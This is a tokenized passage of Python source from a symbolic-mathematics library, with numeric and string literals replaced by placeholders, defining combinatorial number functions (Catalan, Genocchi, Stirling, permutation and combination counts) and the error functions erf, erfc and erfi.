( ( - <NUM_LIT:1> ) ** j * ( k - <NUM_LIT:2> * j ) ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) ) / <EOL> ( <NUM_LIT:2> ** k * S . ImaginaryUnit ** k * k ) , ( j , <NUM_LIT:0> , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:2> * n + <NUM_LIT:1> ) ) ) <EOL> return Em <EOL> def _eval_evalf ( self , prec ) : <EOL> m = self . args [ <NUM_LIT:0> ] <EOL> if m . is_Integer and m . is_nonnegative : <EOL> from mpmath import mp <EOL> from sympy import Expr <EOL> m = m . 
_to_mpmath ( prec ) <EOL> with workprec ( prec ) : <EOL> res = mp . eulernum ( m ) <EOL> return Expr . _from_mpmath ( res , prec ) <EOL> class catalan ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , n ) : <EOL> from sympy import gamma <EOL> if ( n . is_Integer and n . is_nonnegative ) or ( n . is_noninteger and n . is_negative ) : <EOL> return <NUM_LIT:4> ** n * gamma ( n + S . Half ) / ( gamma ( S . Half ) * gamma ( n + <NUM_LIT:2> ) ) <EOL> if ( n . is_integer and n . is_negative ) : <EOL> if ( n + <NUM_LIT:1> ) . is_negative : <EOL> return S . Zero <EOL> if ( n + <NUM_LIT:1> ) . is_zero : <EOL> return - S . Half <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> from sympy import polygamma , log <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> return catalan ( n ) * ( polygamma ( <NUM_LIT:0> , n + Rational ( <NUM_LIT:1> , <NUM_LIT:2> ) ) - polygamma ( <NUM_LIT:0> , n + <NUM_LIT:2> ) + log ( <NUM_LIT:4> ) ) <EOL> def _eval_rewrite_as_binomial ( self , n ) : <EOL> return binomial ( <NUM_LIT:2> * n , n ) / ( n + <NUM_LIT:1> ) <EOL> def _eval_rewrite_as_factorial ( self , n ) : <EOL> return factorial ( <NUM_LIT:2> * n ) / ( factorial ( n + <NUM_LIT:1> ) * factorial ( n ) ) <EOL> def _eval_rewrite_as_gamma ( self , n ) : <EOL> from sympy import gamma <EOL> return <NUM_LIT:4> ** n * gamma ( n + S . Half ) / ( gamma ( S . Half ) * gamma ( n + <NUM_LIT:2> ) ) <EOL> def _eval_rewrite_as_hyper ( self , n ) : <EOL> from sympy import hyper <EOL> return hyper ( [ <NUM_LIT:1> - n , - n ] , [ <NUM_LIT:2> ] , <NUM_LIT:1> ) <EOL> def _eval_rewrite_as_Product ( self , n ) : <EOL> from sympy import Product <EOL> if not ( n . is_integer and n . is_nonnegative ) : <EOL> return self <EOL> k = Dummy ( '<STR_LIT:k>' , integer = True , positive = True ) <EOL> return Product ( ( n + k ) / k , ( k , <NUM_LIT:2> , n ) ) <EOL> def _eval_evalf ( self , prec ) : <EOL> from sympy import gamma <EOL> if self . args [ <NUM_LIT:0> ] . 
is_number : <EOL> return self . rewrite ( gamma ) . _eval_evalf ( prec ) <EOL> class genocchi ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , n ) : <EOL> if n . is_Number : <EOL> if ( not n . is_Integer ) or n . is_nonpositive : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:2> * ( <NUM_LIT:1> - S ( <NUM_LIT:2> ) ** n ) * bernoulli ( n ) <EOL> if n . is_odd and ( n - <NUM_LIT:1> ) . is_positive : <EOL> return S . Zero <EOL> if ( n - <NUM_LIT:1> ) . is_zero : <EOL> return S . One <EOL> def _eval_rewrite_as_bernoulli ( self , n ) : <EOL> if n . is_integer and n . is_nonnegative : <EOL> return ( <NUM_LIT:1> - S ( <NUM_LIT:2> ) ** n ) * bernoulli ( n ) * <NUM_LIT:2> <EOL> def _eval_is_integer ( self ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_integer and self . args [ <NUM_LIT:0> ] . is_positive : <EOL> return True <EOL> def _eval_is_negative ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_odd : <EOL> return False <EOL> return ( n / <NUM_LIT:2> ) . is_odd <EOL> def _eval_is_positive ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_odd : <EOL> return fuzzy_not ( ( n - <NUM_LIT:1> ) . is_positive ) <EOL> return ( n / <NUM_LIT:2> ) . is_even <EOL> def _eval_is_even ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_even : <EOL> return False <EOL> return ( n - <NUM_LIT:1> ) . is_positive <EOL> def _eval_is_odd ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> if n . is_integer and n . is_positive : <EOL> if n . is_even : <EOL> return True <EOL> return fuzzy_not ( ( n - <NUM_LIT:1> ) . is_positive ) <EOL> def _eval_is_prime ( self ) : <EOL> n = self . args [ <NUM_LIT:0> ] <EOL> return ( n - <NUM_LIT:8> ) . 
is_zero <EOL> class _MultisetHistogram ( tuple ) : <EOL> pass <EOL> _N = - <NUM_LIT:1> <EOL> _ITEMS = - <NUM_LIT:2> <EOL> _M = slice ( None , _ITEMS ) <EOL> def _multiset_histogram ( n ) : <EOL> """<STR_LIT>""" <EOL> if type ( n ) is dict : <EOL> if not all ( isinstance ( v , int ) and v >= <NUM_LIT:0> for v in n . values ( ) ) : <EOL> raise ValueError <EOL> tot = sum ( n . values ( ) ) <EOL> items = sum ( <NUM_LIT:1> for k in n if n [ k ] > <NUM_LIT:0> ) <EOL> return _MultisetHistogram ( [ n [ k ] for k in n if n [ k ] > <NUM_LIT:0> ] + [ items , tot ] ) <EOL> else : <EOL> n = list ( n ) <EOL> s = set ( n ) <EOL> if len ( s ) == len ( n ) : <EOL> n = [ <NUM_LIT:1> ] * len ( n ) <EOL> n . extend ( [ len ( n ) , len ( n ) ] ) <EOL> return _MultisetHistogram ( n ) <EOL> m = dict ( zip ( s , range ( len ( s ) ) ) ) <EOL> d = dict ( zip ( range ( len ( s ) ) , [ <NUM_LIT:0> ] * len ( s ) ) ) <EOL> for i in n : <EOL> d [ m [ i ] ] += <NUM_LIT:1> <EOL> return _multiset_histogram ( d ) <EOL> def nP ( n , k = None , replacement = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> n = as_int ( n ) <EOL> except ValueError : <EOL> return Integer ( _nP ( _multiset_histogram ( n ) , k , replacement ) ) <EOL> return Integer ( _nP ( n , k , replacement ) ) <EOL> @ cacheit <EOL> def _nP ( n , k = None , replacement = False ) : <EOL> from sympy . functions . combinatorial . factorials import factorial <EOL> from sympy . core . 
mul import prod <EOL> if k == <NUM_LIT:0> : <EOL> return <NUM_LIT:1> <EOL> if isinstance ( n , SYMPY_INTS ) : <EOL> if k is None : <EOL> return sum ( _nP ( n , i , replacement ) for i in range ( n + <NUM_LIT:1> ) ) <EOL> elif replacement : <EOL> return n ** k <EOL> elif k > n : <EOL> return <NUM_LIT:0> <EOL> elif k == n : <EOL> return factorial ( k ) <EOL> elif k == <NUM_LIT:1> : <EOL> return n <EOL> else : <EOL> return _product ( n - k + <NUM_LIT:1> , n ) <EOL> elif isinstance ( n , _MultisetHistogram ) : <EOL> if k is None : <EOL> return sum ( _nP ( n , i , replacement ) for i in range ( n [ _N ] + <NUM_LIT:1> ) ) <EOL> elif replacement : <EOL> return n [ _ITEMS ] ** k <EOL> elif k == n [ _N ] : <EOL> return factorial ( k ) / prod ( [ factorial ( i ) for i in n [ _M ] if i > <NUM_LIT:1> ] ) <EOL> elif k > n [ _N ] : <EOL> return <NUM_LIT:0> <EOL> elif k == <NUM_LIT:1> : <EOL> return n [ _ITEMS ] <EOL> else : <EOL> tot = <NUM_LIT:0> <EOL> n = list ( n ) <EOL> for i in range ( len ( n [ _M ] ) ) : <EOL> if not n [ i ] : <EOL> continue <EOL> n [ _N ] -= <NUM_LIT:1> <EOL> if n [ i ] == <NUM_LIT:1> : <EOL> n [ i ] = <NUM_LIT:0> <EOL> n [ _ITEMS ] -= <NUM_LIT:1> <EOL> tot += _nP ( _MultisetHistogram ( n ) , k - <NUM_LIT:1> ) <EOL> n [ _ITEMS ] += <NUM_LIT:1> <EOL> n [ i ] = <NUM_LIT:1> <EOL> else : <EOL> n [ i ] -= <NUM_LIT:1> <EOL> tot += _nP ( _MultisetHistogram ( n ) , k - <NUM_LIT:1> ) <EOL> n [ i ] += <NUM_LIT:1> <EOL> n [ _N ] += <NUM_LIT:1> <EOL> return tot <EOL> @ cacheit <EOL> def _AOP_product ( n ) : <EOL> """<STR_LIT>""" <EOL> from collections import defaultdict <EOL> n = list ( n ) <EOL> ord = sum ( n ) <EOL> need = ( ord + <NUM_LIT:2> ) // <NUM_LIT:2> <EOL> rv = [ <NUM_LIT:1> ] * ( n . pop ( ) + <NUM_LIT:1> ) <EOL> rv . extend ( [ <NUM_LIT:0> ] * ( need - len ( rv ) ) ) <EOL> rv = rv [ : need ] <EOL> while n : <EOL> ni = n . 
pop ( ) <EOL> N = ni + <NUM_LIT:1> <EOL> was = rv [ : ] <EOL> for i in range ( <NUM_LIT:1> , min ( N , len ( rv ) ) ) : <EOL> rv [ i ] += rv [ i - <NUM_LIT:1> ] <EOL> for i in range ( N , need ) : <EOL> rv [ i ] += rv [ i - <NUM_LIT:1> ] - was [ i - N ] <EOL> rev = list ( reversed ( rv ) ) <EOL> if ord % <NUM_LIT:2> : <EOL> rv = rv + rev <EOL> else : <EOL> rv [ - <NUM_LIT:1> : ] = rev <EOL> d = defaultdict ( int ) <EOL> for i in range ( len ( rv ) ) : <EOL> d [ i ] = rv [ i ] <EOL> return d <EOL> def nC ( n , k = None , replacement = False ) : <EOL> """<STR_LIT>""" <EOL> from sympy . functions . combinatorial . factorials import binomial <EOL> from sympy . core . mul import prod <EOL> if isinstance ( n , SYMPY_INTS ) : <EOL> if k is None : <EOL> if not replacement : <EOL> return <NUM_LIT:2> ** n <EOL> return sum ( nC ( n , i , replacement ) for i in range ( n + <NUM_LIT:1> ) ) <EOL> if k < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if replacement : <EOL> return binomial ( n + k - <NUM_LIT:1> , k ) <EOL> return binomial ( n , k ) <EOL> if isinstance ( n , _MultisetHistogram ) : <EOL> N = n [ _N ] <EOL> if k is None : <EOL> if not replacement : <EOL> return prod ( m + <NUM_LIT:1> for m in n [ _M ] ) <EOL> return sum ( nC ( n , i , replacement ) for i in range ( N + <NUM_LIT:1> ) ) <EOL> elif replacement : <EOL> return nC ( n [ _ITEMS ] , k , replacement ) <EOL> elif k in ( <NUM_LIT:1> , N - <NUM_LIT:1> ) : <EOL> return n [ _ITEMS ] <EOL> elif k in ( <NUM_LIT:0> , N ) : <EOL> return <NUM_LIT:1> <EOL> return _AOP_product ( tuple ( n [ _M ] ) ) [ k ] <EOL> else : <EOL> return nC ( _multiset_histogram ( n ) , k , replacement ) <EOL> @ cacheit <EOL> def _stirling1 ( n , k ) : <EOL> if n == k == <NUM_LIT:0> : <EOL> return S . One <EOL> if <NUM_LIT:0> in ( n , k ) : <EOL> return S . Zero <EOL> n1 = n - <NUM_LIT:1> <EOL> if n == k : <EOL> return S . 
One <EOL> elif k == <NUM_LIT:1> : <EOL> return factorial ( n1 ) <EOL> elif k == n1 : <EOL> return binomial ( n , <NUM_LIT:2> ) <EOL> elif k == n - <NUM_LIT:2> : <EOL> return ( <NUM_LIT:3> * n - <NUM_LIT:1> ) * binomial ( n , <NUM_LIT:3> ) / <NUM_LIT:4> <EOL> elif k == n - <NUM_LIT:3> : <EOL> return binomial ( n , <NUM_LIT:2> ) * binomial ( n , <NUM_LIT:4> ) <EOL> return n1 * _stirling1 ( n1 , k ) + _stirling1 ( n1 , k - <NUM_LIT:1> ) <EOL> @ cacheit <EOL> def _stirling2 ( n , k ) : <EOL> if n == k == <NUM_LIT:0> : <EOL> return S . One <EOL> if <NUM_LIT:0> in ( n , k ) : <EOL> return S . Zero <EOL> n1 = n - <NUM_LIT:1> <EOL> if k == n1 : <EOL> return binomial ( n , <NUM_LIT:2> ) <EOL> elif k == <NUM_LIT:2> : <EOL> return <NUM_LIT:2> ** n1 - <NUM_LIT:1> <EOL> return k * _stirling2 ( n1 , k ) + _stirling2 ( n1 , k - <NUM_LIT:1> ) <EOL> def stirling ( n , k , d = None , kind = <NUM_LIT:2> , signed = False ) : <EOL> """<STR_LIT>""" <EOL> n = as_int ( n ) <EOL> k = as_int ( k ) <EOL> if n < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if k > n : <EOL> return S . Zero <EOL> if d : <EOL> return _stirling2 ( n - d + <NUM_LIT:1> , k - d + <NUM_LIT:1> ) <EOL> elif signed : <EOL> return ( - <NUM_LIT:1> ) ** ( n - k ) * _stirling1 ( n , k ) <EOL> if kind == <NUM_LIT:1> : <EOL> return _stirling1 ( n , k ) <EOL> elif kind == <NUM_LIT:2> : <EOL> return _stirling2 ( n , k ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % k ) <EOL> @ cacheit <EOL> def _nT ( n , k ) : <EOL> """<STR_LIT>""" <EOL> if k == <NUM_LIT:0> : <EOL> return <NUM_LIT:1> if k == n else <NUM_LIT:0> <EOL> return sum ( _nT ( n - k , j ) for j in range ( min ( k , n - k ) + <NUM_LIT:1> ) ) <EOL> def nT ( n , k = None ) : <EOL> """<STR_LIT>""" <EOL> from sympy . utilities . 
enumerative import MultisetPartitionTraverser <EOL> if isinstance ( n , SYMPY_INTS ) : <EOL> if k is None : <EOL> return sum ( _nT ( n , k ) for k in range ( <NUM_LIT:1> , n + <NUM_LIT:1> ) ) <EOL> return _nT ( n , k ) <EOL> if not isinstance ( n , _MultisetHistogram ) : <EOL> try : <EOL> u = len ( set ( n ) ) <EOL> if u == <NUM_LIT:1> : <EOL> return nT ( len ( n ) , k ) <EOL> elif u == len ( n ) : <EOL> n = range ( u ) <EOL> raise TypeError <EOL> except TypeError : <EOL> n = _multiset_histogram ( n ) <EOL> N = n [ _N ] <EOL> if k is None and N == <NUM_LIT:1> : <EOL> return <NUM_LIT:1> <EOL> if k in ( <NUM_LIT:1> , N ) : <EOL> return <NUM_LIT:1> <EOL> if k == <NUM_LIT:2> or N == <NUM_LIT:2> and k is None : <EOL> m , r = divmod ( N , <NUM_LIT:2> ) <EOL> rv = sum ( nC ( n , i ) for i in range ( <NUM_LIT:1> , m + <NUM_LIT:1> ) ) <EOL> if not r : <EOL> rv -= nC ( n , m ) // <NUM_LIT:2> <EOL> if k is None : <EOL> rv += <NUM_LIT:1> <EOL> return rv <EOL> if N == n [ _ITEMS ] : <EOL> if k is None : <EOL> return bell ( N ) <EOL> return stirling ( N , k ) <EOL> m = MultisetPartitionTraverser ( ) <EOL> if k is None : <EOL> return m . count_partitions ( n [ _M ] ) <EOL> tot = <NUM_LIT:0> <EOL> for discard in m . enum_range ( n [ _M ] , k - <NUM_LIT:1> , k ) : <EOL> tot += <NUM_LIT:1> <EOL> return tot </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import Add , S , sympify , cacheit , pi , I <EOL> from sympy . core . function import Function , ArgumentIndexError <EOL> from sympy . core . symbol import Symbol <EOL> from sympy . functions . combinatorial . factorials import factorial <EOL> from sympy . functions . elementary . integers import floor <EOL> from sympy . functions . elementary . miscellaneous import sqrt , root <EOL> from sympy . functions . elementary . exponential import exp , log <EOL> from sympy . functions . elementary . complexes import polar_lift <EOL> from sympy . functions . elementary . hyperbolic import cosh , sinh <EOL> from sympy . functions . elementary . trigonometric import cos , sin , sinc <EOL> from sympy . functions . special . hyper import hyper , meijerg <EOL> from sympy . core . compatibility import range <EOL> class erf ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> unbranched = True <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return <NUM_LIT:2> * exp ( - self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erfinv <EOL> @ classmethod <EOL> def eval ( cls , arg ) : <EOL> if arg . is_Number : <EOL> if arg is S . NaN : <EOL> return S . NaN <EOL> elif arg is S . Infinity : <EOL> return S . One <EOL> elif arg is S . NegativeInfinity : <EOL> return S . NegativeOne <EOL> elif arg is S . Zero : <EOL> return S . Zero <EOL> if arg . func is erfinv : <EOL> return arg . args [ <NUM_LIT:0> ] <EOL> if arg . func is erfcinv : <EOL> return S . One - arg . args [ <NUM_LIT:0> ] <EOL> if arg . func is erf2inv and arg . args [ <NUM_LIT:0> ] is S . Zero : <EOL> return arg . args [ <NUM_LIT:1> ] <EOL> t = arg . extract_multiplicatively ( S . ImaginaryUnit ) <EOL> if t is S . Infinity or t is S . 
NegativeInfinity : <EOL> return arg <EOL> if arg . could_extract_minus_sign ( ) : <EOL> return - cls ( - arg ) <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> or n % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> k = floor ( ( n - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) <EOL> if len ( previous_terms ) > <NUM_LIT:2> : <EOL> return - previous_terms [ - <NUM_LIT:2> ] * x ** <NUM_LIT:2> * ( n - <NUM_LIT:2> ) / ( n * k ) <EOL> else : <EOL> return <NUM_LIT:2> * ( - <NUM_LIT:1> ) ** k * x ** n / ( n * factorial ( k ) * sqrt ( S . Pi ) ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return sqrt ( z ** <NUM_LIT:2> ) / z * ( S . One - uppergamma ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) <EOL> def _eval_rewrite_as_fresnels ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_fresnelc ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return z / sqrt ( pi ) * meijerg ( [ S . Half ] , [ ] , [ <NUM_LIT:0> ] , [ - S . Half ] , z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return <NUM_LIT:2> * z / sqrt ( pi ) * hyper ( [ S . Half ] , [ <NUM_LIT:3> * S . Half ] , - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return sqrt ( z ** <NUM_LIT:2> ) / z - z * expint ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . 
Pi ) <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return S . One - _erfs ( z ) * exp ( - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_erfc ( self , z ) : <EOL> return S . One - erfc ( z ) <EOL> def _eval_rewrite_as_erfi ( self , z ) : <EOL> return - I * erfi ( I * z ) <EOL> def _eval_as_leading_term ( self , x ) : <EOL> from sympy import Order <EOL> arg = self . args [ <NUM_LIT:0> ] . as_leading_term ( x ) <EOL> if x in arg . free_symbols and Order ( <NUM_LIT:1> , x ) . contains ( arg ) : <EOL> return <NUM_LIT:2> * x / sqrt ( pi ) <EOL> else : <EOL> return self . func ( arg ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> x , y = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> x , y = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class erfc ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> unbranched = True <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return - <NUM_LIT:2> * exp ( - self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erfcinv <EOL> @ classmethod <EOL> def eval ( cls , arg ) : <EOL> if arg . is_Number : <EOL> if arg is S . NaN : <EOL> return S . NaN <EOL> elif arg is S . Infinity : <EOL> return S . Zero <EOL> elif arg is S . 
Zero : <EOL> return S . One <EOL> if arg . func is erfinv : <EOL> return S . One - arg . args [ <NUM_LIT:0> ] <EOL> if arg . func is erfcinv : <EOL> return arg . args [ <NUM_LIT:0> ] <EOL> t = arg . extract_multiplicatively ( S . ImaginaryUnit ) <EOL> if t is S . Infinity or t is S . NegativeInfinity : <EOL> return - arg <EOL> if arg . could_extract_minus_sign ( ) : <EOL> return S ( <NUM_LIT:2> ) - cls ( - arg ) <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n == <NUM_LIT:0> : <EOL> return S . One <EOL> elif n < <NUM_LIT:0> or n % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> k = floor ( ( n - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) <EOL> if len ( previous_terms ) > <NUM_LIT:2> : <EOL> return - previous_terms [ - <NUM_LIT:2> ] * x ** <NUM_LIT:2> * ( n - <NUM_LIT:2> ) / ( n * k ) <EOL> else : <EOL> return - <NUM_LIT:2> * ( - <NUM_LIT:1> ) ** k * x ** n / ( n * factorial ( k ) * sqrt ( S . Pi ) ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return self . rewrite ( erf ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return S . One - erf ( z ) <EOL> def _eval_rewrite_as_erfi ( self , z ) : <EOL> return S . One + I * erfi ( I * z ) <EOL> def _eval_rewrite_as_fresnels ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return S . One - ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_fresnelc ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return S . One - ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return S . 
One - z / sqrt ( pi ) * meijerg ( [ S . Half ] , [ ] , [ <NUM_LIT:0> ] , [ - S . Half ] , z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return S . One - <NUM_LIT:2> * z / sqrt ( pi ) * hyper ( [ S . Half ] , [ <NUM_LIT:3> * S . Half ] , - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return S . One - sqrt ( z ** <NUM_LIT:2> ) / z * ( S . One - uppergamma ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return S . One - sqrt ( z ** <NUM_LIT:2> ) / z + z * expint ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> def _eval_as_leading_term ( self , x ) : <EOL> from sympy import Order <EOL> arg = self . args [ <NUM_LIT:0> ] . as_leading_term ( x ) <EOL> if x in arg . free_symbols and Order ( <NUM_LIT:1> , x ) . contains ( arg ) : <EOL> return S . One <EOL> else : <EOL> return self . func ( arg ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> x , y = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> x , y = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class erfi ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> unbranched = True <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return <NUM_LIT:2> * exp ( self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) / sqrt ( S . 
Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z . is_Number : <EOL> if z is S . NaN : <EOL> return S . NaN <EOL> elif z is S . Zero : <EOL> return S . Zero <EOL> elif z is S . Infinity : <EOL> return S . Infinity <EOL> if z . could_extract_minus_sign ( ) : <EOL> return - cls ( - z ) <EOL> nz = z . extract_multiplicatively ( I ) <EOL> if nz is not None : <EOL> if nz is S . Infinity : <EOL> return I <EOL> if nz . func is erfinv : <EOL> return I * nz . args [ <NUM_LIT:0> ] <EOL> if nz . func is erfcinv : <EOL> return I * ( S . One - nz . args [ <NUM_LIT:0> ] ) <EOL> if nz . func is erf2inv and nz . args [ <NUM_LIT:0> ] is S . Zero : <EOL> return I * nz . args [ <NUM_LIT:1> ] <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> or n % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> k = floor ( ( n - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) <EOL> if len ( previous_terms ) > <NUM_LIT:2> : <EOL> return previous_terms [ - <NUM_LIT:2> ] * x ** <NUM_LIT:2> * ( n - <NUM_LIT:2> ) / ( n * k ) <EOL> else : <EOL> return <NUM_LIT:2> * x ** n / ( n * factorial ( k ) * sqrt ( S . Pi ) ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return self . rewrite ( erf ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return - I * erf ( I * z ) <EOL> def _eval_rewrite_as_erfc ( self , z ) : <EOL> return I * erfc ( I * z ) - I <EOL> def _eval_rewrite_as_fresnels ( self , z ) : <EOL> arg = ( S . One + S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One - S . 
ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_fresnelc ( self , z ) : <EOL> arg = ( S . One + S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One - S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return z / sqrt ( pi ) * meijerg ( [ S . Half ] , [ ] , [ <NUM_LIT:0> ] , [ - S . Half ] , - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return <NUM_LIT:2> * z / sqrt ( pi ) * hyper ( [ S . Half ] , [ <NUM_LIT:3> * S . Half ] , z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return sqrt ( - z ** <NUM_LIT:2> ) / z * ( uppergamma ( S . Half , - z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) - S . One ) <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return sqrt ( - z ** <NUM_LIT:2> ) / z - z * expint ( S . Half 